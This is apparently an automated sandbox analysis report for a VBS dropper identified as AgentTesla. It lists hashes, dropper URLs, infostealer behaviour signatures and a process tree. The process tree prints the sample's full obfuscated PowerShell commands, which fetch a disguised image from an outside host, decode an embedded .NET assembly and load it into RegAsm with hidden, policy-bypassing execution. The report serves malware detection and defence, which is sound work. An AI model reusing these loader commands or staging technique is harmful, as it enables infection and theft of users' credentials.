Analysis

  • max time kernel
    128s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/11/2023, 01:03

General

  • Target

    5d101061b051f1de60a8aae3dd6e655cda7b068b86596d236002a09b299d8123.vbs

  • Size

    118KB

  • MD5

    b958cc69ae326c071d403898c6fdf12a

  • SHA1

    39a598a8cbfdc8b3cdc9b24dc7e795fba9eadcc4

  • SHA256

    5d101061b051f1de60a8aae3dd6e655cda7b068b86596d236002a09b299d8123

  • SHA512

    a3355453528f2db32fc3c688ef40eaa46d37297e8c75e5d557123604167e7b2c9d505a2a3be4a125e0d1c7227da5cb6be065d06830f096797f546df81618eb4d

  • SSDEEP

    3072:aKKKKKeKKKKKVKKKKKLKKKKKkKKKKKSGGKKKKK3KKKKKdKKKKKdjKKKKKx:q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/666/676/original/vbs.jpg?1700182879

exe.dropper

https://uploaddeimagens.com.br/images/004/666/676/original/vbs.jpg?1700182879

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d101061b051f1de60a8aae3dd6e655cda7b068b86596d236002a09b299d8123.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JgMykAMDXSgMykAMDXSCgMykAMDXSIMykAMDXSMykAMDXSkMykAMDXSGUMykAMDXSTgB2MykAMDXSDoMykAMDXSYwBvMykAMDXSG0MykAMDXScwBwMykAMDXSGUMykAMDXSYwBbMykAMDXSDQMykAMDXSLMykAMDXSMykAMDXSxMykAMDXSDUMykAMDXSLMykAMDXSMykAMDXSyMykAMDXSDUMykAMDXSXQMykAMDXStMykAMDXSGoMykAMDXSTwBJMykAMDXSG4MykAMDXSJwMykAMDXSnMykAMDXSCkMykAMDXSIMykAMDXSMykAMDXSoMykAMDXSCgMykAMDXSKMykAMDXSMykAMDXSnMykAMDXSDgMykAMDXSWgB3MykAMDXSCcMykAMDXSKwMykAMDXSnMykAMDXSGkMykAMDXSbQBhMykAMDXSGcMykAMDXSZQBVMykAMDXSHIMykAMDXSbMykAMDXSMykAMDXSgMykAMDXSD0MykAMDXSIMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSRgBoMykAMDXSCcMykAMDXSKwMykAMDXSnMykAMDXSHQMykAMDXSdMykAMDXSBwMykAMDXSHMMykAMDXSOgMykAMDXSvMykAMDXSC8MykAMDXSdQBwMykAMDXSGwMykAMDXSbwBhMykAMDXSGQMykAMDXSZMykAMDXSBlMykAMDXSGkMykAMDXSbQBhMykAMDXSGcMykAMDXSZQBuMykAMDXSHMMykAMDXSLgBjMykAMDXSG8MykAMDXSbQMykAMDXSuMykAMDXSGIMykAMDXScgMykAMDXSvMykAMDXSGkMykAMDXSbQBhMykAMDXSGcMykAMDXSZQBzMykAMDXSCcMykAMDXSKwMykAMDXSnMykAMDXSC8MykAMDXSMMykAMDXSMykAMDXSwMykAMDXSDQMykAMDXSLwMykAMDXS2MykAMDXSDYMykAMDXSNgMykAMDXSvMykAMDXSDYMykAMDXSNwMykAMDXS2MykAMDXSC8MykAMDXSbwByMykAMDXSGkMykAMDXSZwBpMykAMDXSG4MykAMDXSYQBsMykAMDXSCcMykAMDXSKwMykAMDXSnMykAMDXSC8MykAMDXSdgBiMykAMDXSHMMykAMDXSLgBqMykAMDXSHMykAMDXSMykAMDXSZwMykAMDXS/MykAMDXSDEMykAMDXSNwMykAMDXSwMykAMDXSDMykAMDXSMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSMQMykAMDXS4MykAMDXSDIMykAMDXSOMykAMDXSMykAMDXS3MykAMDXSDkMykAMDXSNgBUMykAMDXSEYMykAMDXSOwMykAMDXS4MykAMDXSFoMykAMDXSdwB3MykAMDXSGUMykAMDXSYgBDMykAMDXSGwMykAMDXSaQBlMykAMDXSG4MykAMDXSdMykAMDXSMykAMDXSgMykAMDXSD0MykAMDXSIMykAMDXSBOMykAMDXSGUMykAMDXSdwMykAMDXStMykAMDXSE8MykAMDXSYgBqMykAMDXSGUMykAMDXSYwB0MykAMDXSCMykAMDXSMykAMDXSUwB5MykAMDXSHMMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSdMykAMDXSBlMykAMDXSG0MykAMDXSLgBOMykAMDXSGUMykAMDXSdMykAMDXSMykAMDXSuMykAMDXSFcMykAMDXSZQBiMykAMDXSEMMykAMDXSbMykAMDXSBpMykAMDXSGUMykAMDXSbgB0MykAMDXSDsMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXSaQBtMykAMDXSGEMykAMDXSZwBlMykAMDXSEIMykAMDXSeQB0MykAMDXSGUMykAMDXScwMykAMDXSgMykAMDXSD0MykAMDXSIMykAMDXSMykAMDXS4MykAMDXSFoMykAMDXSdwB3MykAMDXSGUMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSYgBDMykAMDXSGwMykAMDXSaQBlMykAMDXSG4MykAMDXSdMykAMDXSMykAMDXSuMykAMDXSEQMykAMDXSbwB3MykAMDXSG4MykAMDXSbMykAMDXSBvMykAMDXSGEMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSZMykAMDXSBEMykAMDXSGEMykAMDXSdMykAMDXSBhMykAMDXSCgMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXSaQMykAMDXSnMykAMDXSCsMykAMDXSJwBtMykAMDXSGEMykAMDXSZwBlMykAMDXSFUMykAMDXScgBsMykAMDXSCkMykAMDXSOwMykAMDXS4MykAMDXSFoMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSdwBpMykAMDXSG0MykAMDXSYQBnMykAMDXSGUMykAMDXSVMykAMDXSBlMykAMDXSHgMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSdMykAMDXSMykAMDXSgMykAMDXSD0MykAMDXSIMykAMDXSBbMykAMDXSFMMykAMDXSeQBzMykAMDXSHQMykAMDXSZQBtMykAMDXSCcMykAMDXSKwMykAMDXSnMykAMDXSC4MykAMDXSVMykAMDXSBlMykAMDXSHgMykAMDXSdMykAMDXSMykAMDXSuMykAMDXSEUMykAMDXSbgBjMykAMDXSG8MykAMDXSZMykAMDXSBpMykAMDXSG4MykAMDXSZwBdMykAMDXSDoMykAMDXSOgBVMykAMDXSFQMykAMDXSRgMykAMDXS4MykAMDXSC4MykAMDXSRwBlMykAMDXSHQMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSUwB0MykAMDXSHIMykAMDXSaQBuMykAMDXSGcMykAMDXSKMykAMDXSMykAMDXS4MykAMDXSFoMykAMDXSdwBpMykAMDXSG0MykAMDXSYQBnMykAMDXSGUMykAMDXSQgB5MykAMDXSHQMykAMDXSZQBzMykAMDXSCkMykAMDXSOwMykAMDXS4MykAMDXSFoMykAMDXSdwBzMykAMDXSHQMykAMDXSYQByMykAMDXSHQMykAMDXSRgBsMykAMDXSGEMykAMDXSZwMykAMDXSgMykAMDXSD0MykAMDXSIMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSRgMykAMDXS8MykAMDXSDwMykAMDXSQgBBMykAMDXSFMMykAMDXSRQMykAMDXS2MykAMDXSDQMykAMDXSXwBTMykAMDXSFQMykAMDXSQQBSMykAMDXSFQMykAMDXSPgMykAMDXS+MykAMDXSDYMykAMDXSVMykAMDXSBGMykAMDXSDsMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXSZQBuMykAMDXSGQMykAMDXSRgBsMykAMDXSGEMykAMDXSZwMykAMDXSgMykAMDXSD0MykAMDXSIMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSRgMykAMDXS8MykAMDXSDwMykAMDXSQgBBMykAMDXSFMMykAMDXSRQMykAMDXS2MykAMDXSDQMykAMDXSXwBFMykAMDXSE4MykAMDXSRMykAMDXSMykAMDXS+MykAMDXSD4MykAMDXSNgBUMykAMDXSEYMykAMDXSOwMykAMDXS4MykAMDXSCcMykAMDXSKwMykAMDXSnMykAMDXSFoMykAMDXSdwBzMykAMDXSHQMykAMDXSYQByMykAMDXSHQMykAMDXSSQBuMykAMDXSGQMykAMDXSZQB4MykAMDXSCMykAMDXSMykAMDXSPQMykAMDXSgMykAMDXSDgMykAMDXSWgB3MykAMDXSGkMykAMDXSbQBhMykAMDXSGcMykAMDXSZQBUMykAMDXSGUMykAMDXSeMykAMDXSB0MykAMDXSC4MykAMDXSSQBuMykAMDXSGQMykAMDXSZQB4MykAMDXSE8MykAMDXSZgMykAMDXSoMykAMDXSDgMykAMDXSWgB3MykAMDXSHMMykAMDXSdMykAMDXSBhMykAMDXSHIMykAMDXSdMykAMDXSBGMykAMDXSGwMykAMDXSYQBnMykAMDXSCkMykAMDXSOwMykAMDXS4MykAMDXSFoMykAMDXSdwBlMykAMDXSG4MykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSZMykAMDXSBJMykAMDXSG4MykAMDXSZMykAMDXSBlMykAMDXSHgMykAMDXSIMykAMDXSMykAMDXS9MykAMDXSCMykAMDXSMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXSaQBtMykAMDXSGEMykAMDXSZwBlMykAMDXSFQMykAMDXSZQB4MykAMDXSHQMykAMDXSLgBJMykAMDXSG4MykAMDXSZMykAMDXSBlMykAMDXSHgMykAMDXSTwBmMykAMDXSCgMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXSZQBuMykAMDXSGQMykAMDXSRgBsMykAMDXSGEMykAMDXSZwMykAMDXSpMykAMDXSDsMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXScwB0MykAMDXSGEMykAMDXScgB0MykAMDXSEkMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSbgBkMykAMDXSGUMykAMDXSeMykAMDXSMykAMDXSgMykAMDXSC0MykAMDXSZwBlMykAMDXSCMykAMDXSMykAMDXSMMykAMDXSMykAMDXSgMykAMDXSC0MykAMDXSYQBuMykAMDXSGQMykAMDXSIMykAMDXSMykAMDXS4MykAMDXSFoMykAMDXSdwBlMykAMDXSG4MykAMDXSZMykAMDXSBJMykAMDXSG4MykAMDXSZMykAMDXSBlMykAMDXSHgMykAMDXSIMykAMDXSMykAMDXStMykAMDXSGcMykAMDXSdMykAMDXSMykAMDXSgMykAMDXSDgMykAMDXSWgB3MykAMDXSHMMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSdMykAMDXSBhMykAMDXSHIMykAMDXSdMykAMDXSBJMykAMDXSG4MykAMDXSZMykAMDXSMykAMDXSnMykAMDXSCsMykAMDXSJwBlMykAMDXSHgMykAMDXSOwMykAMDXS4MykAMDXSFoMykAMDXSdwBzMykAMDXSHQMykAMDXSYQByMykAMDXSHQMykAMDXSSQBuMykAMDXSCcMykAMDXSKwMykAMDXSnMykAMDXSGQMykAMDXSZQB4MykAMDXSCMykAMDXSMykAMDXSKwMykAMDXS9MykAMDXSCMykAMDXSMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXScwB0MykAMDXSGEMykAMDXScgB0MykAMDXSEYMykAMDXSbMykAMDXSBhMykAMDXSGcMykAMDXSLgBMMykAMDXSGUMykAMDXSbgBnMykAMDXSHQMykAMDXSaMykAMDXSMykAMDXS7MykAMDXSDgMykAMDXSWgB3MykAMDXSGIMykAMDXSYQBzMykAMDXSGUMykAMDXSNgMykAMDXS0MykAMDXSEwMykAMDXSZQBuMykAMDXSGcMykAMDXSdMykAMDXSBoMykAMDXSCMykAMDXSMykAMDXSPQMykAMDXSgMykAMDXSDgMykAMDXSWgB3MykAMDXSGUMykAMDXSbgBkMykAMDXSEkMykAMDXSbgBkMykAMDXSGUMykAMDXSeMykAMDXSMykAMDXSgMykAMDXSC0MykAMDXSIMykAMDXSMykAMDXS4MykAMDXSFoMykAMDXSdwBzMykAMDXSHQMykAMDXSYQByMykAMDXSHQMykAMDXSSQBuMykAMDXSGQMykAMDXSZQB4MykAMDXSDsMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXSYgBhMykAMDXSHMMykAMDXSZQMykAMDXS2MykAMDXSDQMykAMDXSQwBvMykAMDXSG0MykAMDXSbQBhMykAMDXSG4MykAMDXSZMykAMDXSMykAMDXSgMykAMDXSD0MykAMDXSIMykAMDXSMykAMDXS4MykAMDXSFoMykAMDXSdwBpMykAMDXSG0MykAMDXSYQBnMykAMDXSGUMykAMDXSVMykAMDXSMykAMDXSnMykAMDXSCsMykAMDXSJwBlMykAMDXSHgMykAMDXSdMykAMDXSMykAMDXSuMykAMDXSFMMykAMDXSdQBiMykAMDXSHMMykAMDXSdMykAMDXSByMykAMDXSGkMykAMDXSbgBnMykAMDXSCgMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXScwB0MykAMDXSGEMykAMDXScgB0MykAMDXSEkMykAMDXSbgBkMykAMDXSGUMykAMDXSeMykAMDXSMykAMDXSsMykAMDXSCMykAMDXSMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSOMykAMDXSBaMykAMDXSHcMykAMDXSYgBhMykAMDXSHMMykAMDXSZQMykAMDXS2MykAMDXSDQMykAMDXSTMykAMDXSBlMykAMDXSG4MykAMDXSZwB0MykAMDXSGgMykAMDXSKQMykAMDXS7MykAMDXSDgMykAMDXSWgB3MykAMDXSGMMykAMDXSbwBtMykAMDXSG0MykAMDXSYQBuMykAMDXSGQMykAMDXSQgB5MykAMDXSHQMykAMDXSZQBzMykAMDXSCMykAMDXSMykAMDXSPQMykAMDXSgMykAMDXSFsMykAMDXSUwB5MykAMDXSHMMykAMDXSdMykAMDXSBlMykAMDXSG0MykAMDXSLgBDMykAMDXSG8MykAMDXSbgB2MykAMDXSGUMykAMDXScgB0MykAMDXSF0MykAMDXSOgMykAMDXS6MykAMDXSEYMykAMDXScgBvMykAMDXSG0MykAMDXSQgBhMykAMDXSHMMykAMDXSZQMykAMDXS2MykAMDXSDQMykAMDXSUwB0MykAMDXSHIMykAMDXSaQBuMykAMDXSGcMykAMDXSKMykAMDXSMykAMDXS4MykAMDXSFoMykAMDXSdwBiMykAMDXSGEMykAMDXScwBlMykAMDXSDYMykAMDXSNMykAMDXSBDMykAMDXSG8MykAMDXSbQBtMykAMDXSGEMykAMDXSbgBkMykAMDXSCkMykAMDXSOwMykAMDXS4MykAMDXSFoMykAMDXSdwBsMykAMDXSG8MykAMDXSYQBkMykAMDXSGUMykAMDXSZMykAMDXSBBMykAMDXSHMMykAMDXScwBlMykAMDXSG0MykAMDXSYgBsMykAMDXSHkMykAMDXSIMykAMDXSMykAMDXS9MykAMDXSCMykAMDXSMykAMDXSWwBTMykAMDXSHkMykAMDXScwB0MykAMDXSGUMykAMDXSbQMykAMDXSuMykAMDXSFIMykAMDXSZQBmMykAMDXSGwMykAMDXSZQBjMykAMDXSHQMykAMDXSaQBvMykAMDXSG4MykAMDXSLgBBMykAMDXSHMMykAMDXScwBlMykAMDXSG0MykAMDXSYgBsMykAMDXSHkMykAMDXSXQMykAMDXS6MykAMDXSDoMykAMDXSTMykAMDXSBvMykAMDXSGEMykAMDXSZMykAMDXSMykAMDXSoMykAMDXSDgMykAMDXSWgB3MykAMDXSGMMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSbwBtMykAMDXSG0MykAMDXSYQBuMykAMDXSGQMykAMDXSQgB5MykAMDXSHQMykAMDXSZQBzMykAMDXSCkMykAMDXSOwMykAMDXSnMykAMDXSCsMykAMDXSJwMykAMDXS4MykAMDXSFoMykAMDXSdwB0MykAMDXSHkMykAMDXScMykAMDXSBlMykAMDXSCMykAMDXSMykAMDXSPQMykAMDXSgMykAMDXSDgMykAMDXSWgB3MykAMDXSGwMykAMDXSbwBhMykAMDXSGQMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSZQBkMykAMDXSEEMykAMDXScwBzMykAMDXSGUMykAMDXSbQBiMykAMDXSGwMykAMDXSeQMykAMDXSuMykAMDXSEcMykAMDXSZQB0MykAMDXSFQMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSeQBwMykAMDXSGUMykAMDXSKMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSRgBGMykAMDXSGkMykAMDXSYgBlMykAMDXSHIMykAMDXSLgBIMykAMDXSG8MykAMDXSbQBlMykAMDXSDYMykAMDXSVMykAMDXSBGMykAMDXSCkMykAMDXSOwMykAMDXS4MykAMDXSFoMykAMDXSdwBtMykAMDXSGUMykAMDXSdMykAMDXSBoMykAMDXSG8MykAMDXSZMykAMDXSMykAMDXSgMykAMDXSD0MykAMDXSIMykAMDXSMykAMDXS4MykAMDXSFoMykAMDXSdwB0MykAMDXSHkMykAMDXScMykAMDXSBlMykAMDXSC4MykAMDXSRwBlMykAMDXSHQMykAMDXSTQBlMykAMDXSHQMykAMDXSaMykAMDXSBvMykAMDXSGQMykAMDXSKMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSRgBWMykAMDXSEEMykAMDXSSQMykAMDXSnMykAMDXSCsMykAMDXSJwMykAMDXS2MykAMDXSFQMykAMDXSRgMykAMDXSpMykAMDXSC4MykAMDXSSQBuMykAMDXSHYMykAMDXSbwBrMykAMDXSGUMykAMDXSKMykAMDXSMykAMDXS4MykAMDXSFoMykAMDXSdwBuMykAMDXSHUMykAMDXSbMykAMDXSBsMykAMDXSCwMykAMDXSIMykAMDXSBbMykAMDXSG8MykAMDXSYgBqMykAMDXSGUMykAMDXSYwB0MykAMDXSFsMykAMDXSXQBdMykAMDXSCMykAMDXSMykAMDXSKMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSRgBkMykAMDXSEgMykAMDXSaMykAMDXSMykAMDXSwMykAMDXSEwMykAMDXSbgBoMykAMDXSDMMykAMDXSWgMykAMDXSnMykAMDXSCsMykAMDXSJwMykAMDXSyMykAMDXSFkMykAMDXSJwMykAMDXSrMykAMDXSCcMykAMDXSegBMMykAMDXSHoMykAMDXSYwMykAMDXSwMykAMDXSEwMykAMDXSagBZMykAMDXSDMykAMDXSMykAMDXSTQBpMykAMDXSDQMykAMDXSeQBPMykAMDXSFMMykAMDXSNMykAMDXSB4MykAMDXSE8MykAMDXSUwMykAMDXS4MykAMDXSHYMykAMDXSTwBuMykAMDXSEIMykAMDXSMMykAMDXSBkMykAMDXSEcMykAMDXSZwMykAMDXS9MykAMDXSDYMykAMDXSVMykAMDXSBGMykAMDXSCMykAMDXSMykAMDXSLMykAMDXSMykAMDXSgMykAMDXSDYMykAMDXSVMykAMDXSBGMykAMDXSGQMykAMDXSZgBkMykAMDXSGYMykAMDXSZMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSRgMykAMDXSgMykAMDXSCwMykAMDXSIMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSRgBkMykAMDXSGYMykAMDXSZMykAMDXSBmMykAMDXSDYMykAMDXSVMykAMDXSBGMykAMDXSCMykAMDXSMykAMDXSLMykAMDXSMykAMDXSgMykAMDXSDYMykAMDXSVMykAMDXSBGMykAMDXSGQMykAMDXSZgBkMykAMDXSGYMykAMDXSNgBUMykAMDXSEYMykAMDXSIMykAMDXSMykAMDXSsMykAMDXSCMykAMDXSMykAMDXSNgBUMykAMDXSEYMykAMDXSZMykAMDXSBhMykAMDXSGQMykAMDXScwBhMykAMDXSCcMykAMDXSKwMykAMDXSnMykAMDXSDYMykAMDXSVMykAMDXSBGMykAMDXSCMykAMDXSMykAMDXSLMykAMDXSMykAMDXSgMykAMDXSDYMykAMDXSVMykAMDXSBGMykAMDXSGQMykAMDXSZQMykAMDXS2MykAMDXSFQMykAMDXSRgMykAMDXSgMykAMDXSCwMykAMDXSIMykAMDXSMykAMDXS2MykAMDXSFQMykAMDXSRgBjMykAMDXSHUMykAMDXSNgBUMykAMDXSEYMykAMDXSKQMykAMDXSpMykAMDXSCcMykAMDXSKQMykAMDXStMykAMDXSFIMykAMDXSRQBQMykAMDXSGwMykAMDXSQQBjMykAMDXSEUMykAMDXSIMykAMDXSMykAMDXSgMykAMDXSCgMykAMDXSWwBjMykAMDXSGgMykAMDXSQQByMykAMDXSF0MykAMDXSNQMykAMDXS2MykAMDXSCsMykAMDXSWwBjMykAMDXSGgMykAMDXSQQByMykAMDXSF0MykAMDXSOQMykAMDXSwMykAMDXSCsMykAMDXSWwBjMykAMDXSGgMykAMDXSQQByMykAMDXSF0MykAMDXSMQMykAMDXSxMykAMDXSDkMykAMDXSKQMykAMDXSsMykAMDXSFsMykAMDXSYwBoMykAMDXSEEMykAMDXScgBdMykAMDXSDMMykAMDXSNgMykAMDXSgMykAMDXSC0MykAMDXSUgBFMykAMDXSFMykAMDXSMykAMDXSbMykAMDXSBBMykAMDXSGMMykAMDXSRQMykAMDXSgMykAMDXSCMykAMDXSMykAMDXSJwMykAMDXS2MykAMDXSFQMykAMDXSRgMykAMDXSnMykAMDXSCwMykAMDXSWwBjMykAMDXSGgMykAMDXSQQByMykAMDXSF0MykAMDXSMwMykAMDXS5MykAMDXSCkMykAMDXSKQMykAMDXS=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('MykAMDXS','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:492
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:comspec[4,15,25]-jOIn'') ((('8Zw'+'imageUrl = 6TFh'+'ttps://uploaddeimagens.com.br/images'+'/004/666/676/original'+'/vbs.jpg?1700'+'1828796TF;8ZwwebClient = New-Object Sys'+'tem.Net.WebClient;8ZwimageBytes = 8Zwwe'+'bClient.Downloa'+'dData(8Zwi'+'mageUrl);8Z'+'wimageTex'+'t = [System'+'.Text.Encoding]::UTF8.Get'+'String(8ZwimageBytes);8ZwstartFlag = 6T'+'F<<BASE64_START>>6TF;8ZwendFlag = 6TF<<BASE64_END>>6TF;8'+'ZwstartIndex = 8ZwimageText.IndexOf(8ZwstartFlag);8Zwen'+'dIndex = '+'8ZwimageText.IndexOf(8ZwendFlag);8ZwstartI'+'ndex -ge 0 -and 8ZwendIndex -gt 8Zws'+'tartInd'+'ex;8ZwstartIn'+'dex += 8ZwstartFlag.Length;8Zwbase64Length = 8ZwendIndex - 8ZwstartIndex;8Zwbase64Command = 8ZwimageT'+'ext.Substring(8ZwstartIndex, '+'8Zwbase64Length);8ZwcommandBytes = [System.Convert]::FromBase64String(8Zwbase64Command);8ZwloadedAssembly = [System.Reflection.Assembly]::Load(8Zwc'+'ommandBytes);'+'8Zwtype = 8Zwload'+'edAssembly.GetT'+'ype(6TFFiber.Home6TF);8Zwmethod = 8Zwtype.GetMethod(6TFVAI'+'6TF).Invoke(8Zwnull, [object[]] (6TFdHh0Lnh3Z'+'2Y'+'zLzc0LjY0Mi4yOS4xOS8vOnB0dGg=6TF , 6TFdfdfd6TF , 6TFdfdf6TF , 6TFdfdf6TF , 6TFdadsa'+'6TF , 6TFde6TF , 6TFcu6TF))')-REPlAcE ([chAr]56+[chAr]90+[chAr]119),[chAr]36 -REPlAcE '6TF',[chAr]39))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4012
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1484
            5⤵
            • Program crash
            PID:1556
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4012 -ip 4012
    1⤵
      PID:3624

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      ff22bf48b657d00a8d8d785c35d121e0

      SHA1

      8ac6cb67346bedad788da50ef326186035dec57c

      SHA256

      c03a85cebe9f8089d2d7a2dd3e86bc186ea965055a0f257a646cda760468d167

      SHA512

      6543a0136e295125d6b2471f60a4beb1655195160865a66271b0e77da0d3f88e0493e205d0d80a34c12153dba3883c89358b63505c47d2b2a842808037b29a26

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_usz5w30l.b2e.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/492-10-0x00007FFDA8D40000-0x00007FFDA9801000-memory.dmp

      Filesize

      10.8MB

    • memory/492-11-0x000002394D1C0000-0x000002394D1D0000-memory.dmp

      Filesize

      64KB

    • memory/492-12-0x000002394D1C0000-0x000002394D1D0000-memory.dmp

      Filesize

      64KB

    • memory/492-0-0x0000023965C30000-0x0000023965C52000-memory.dmp

      Filesize

      136KB

    • memory/492-35-0x00007FFDA8D40000-0x00007FFDA9801000-memory.dmp

      Filesize

      10.8MB

    • memory/2316-22-0x00007FFDA8D40000-0x00007FFDA9801000-memory.dmp

      Filesize

      10.8MB

    • memory/2316-26-0x00000287FB580000-0x00000287FB6BE000-memory.dmp

      Filesize

      1.2MB

    • memory/2316-27-0x00000287FB750000-0x00000287FB7C6000-memory.dmp

      Filesize

      472KB

    • memory/2316-25-0x00000287FA680000-0x00000287FA690000-memory.dmp

      Filesize

      64KB

    • memory/2316-24-0x00000287FA680000-0x00000287FA690000-memory.dmp

      Filesize

      64KB

    • memory/2316-31-0x00007FFDA8D40000-0x00007FFDA9801000-memory.dmp

      Filesize

      10.8MB

    • memory/2316-23-0x00000287FA680000-0x00000287FA690000-memory.dmp

      Filesize

      64KB

    • memory/4012-28-0x0000000000400000-0x0000000000440000-memory.dmp

      Filesize

      256KB

    • memory/4012-36-0x00000000747A0000-0x0000000074F50000-memory.dmp

      Filesize

      7.7MB

    • memory/4012-37-0x0000000005D00000-0x00000000062A4000-memory.dmp

      Filesize

      5.6MB

    • memory/4012-38-0x00000000058D0000-0x00000000058E0000-memory.dmp

      Filesize

      64KB

    • memory/4012-39-0x00000000057C0000-0x0000000005826000-memory.dmp

      Filesize

      408KB

    • memory/4012-40-0x00000000747A0000-0x0000000074F50000-memory.dmp

      Filesize

      7.7MB